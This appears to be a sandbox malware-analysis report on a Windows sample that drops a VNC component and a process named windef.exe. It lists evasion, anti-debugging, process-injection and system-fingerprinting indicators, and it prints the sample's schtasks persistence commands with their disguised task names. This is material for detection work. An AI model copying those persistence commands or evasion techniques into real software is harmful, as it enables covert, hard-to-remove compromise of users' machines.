Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_00A448D7

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

7_2_00DD3187

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00E1445A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,	5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,	5_2_00C76554
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,	5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00AA445A

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]	1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]	1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h]	7_2_00407AF0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]	10_3_014C00BE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]	10_3_014C00BE

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

1_2_00DE5A7C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

1_2_00DE97A2

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Process token adjusted: Debug

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C9A002 LdrLoadDll,

5_2_00C9A002

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00DDA155
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00DDA155
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00A6A155

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

1_3_037F00BE

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: D00000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380	Jump to behavior

.NET source code references suspicious native API functions

Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Thread register set: target process: 5200

Contains functionality to simulate keystroke presses

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

1_2_00DB48D7

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00E0874B

Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe	Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\svchost.exe	Code function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow,		5_2_00C83460
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: GetLocaleInfoA,		7_2_00404BA8

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Code function: 4_2_00ACEA96 cpuid

4_2_00ACEA96

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv,

1_2_00DD520A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_004065F0 GetUserNameW,

7_2_004065F0

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,